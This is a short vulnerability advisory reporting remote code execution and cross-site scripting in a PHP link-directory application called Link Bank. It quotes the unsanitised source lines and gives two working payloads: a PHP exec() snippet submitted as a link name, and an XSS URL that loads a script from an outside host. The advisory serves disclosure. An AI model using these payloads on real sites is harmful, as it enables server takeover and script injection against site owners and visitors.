link bank code execution and xss

2006.03.08
Risk: Low
Local: No
Remote: Yes
CWE: CWE-Other


CVSS Base Score: 7.5/10
Impact Subscore: 6.4/10
Exploitability Subscore: 10/10
Exploit range: Remote
Attack complexity: Low
Authentication: No required
Confidentiality impact: Partial
Integrity impact: Partial
Availability impact: Partial

??? summary software: Link Bank vendors website: http://daverave.64digits.com/index.php?page=linkbank versions: n/a class: remote status: unpatched exploit: available solution: not available discovered by: retard risk level: high ??? description Link Bank does not sanatise post sumbited to it allowing users to insert data that can be used malisiously. after it is submited the data goes to a .txt file witch the application reads and executes to display the links submited. along with this it is vulnerable to xss due to the application not sanatising the variable again. in ./content/index.txt: 14 <?php 15 include("links.txt"); 16 ?> in ./content/add_link.txt: 2 $url_name = $_REQUEST['url_name']; 3 $url = $_REQUEST['url']; 4 $img = $_REQUEST['img']; 5 $filename = "content/links.txt"; 6 $code = "<a href = iframe.php?site=$url target=_blank>$url_name</a><br>"; in ./iframe.php: 3 <title>Link Bank - <?php echo"$site";?></title> ??? exploit(s) code execution: submit something like <?php exec($cmd) ?> as a link name xss: http://example.com/iframe.php?site=%3C/title%3E%3C/head%3E%3Cscript%20sr c=http://notlegal.ws/xss.js%3E%3C/script%3E ??? credit author(s): retard email: retard (at) 30gigs (dot) com [email concealed]


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top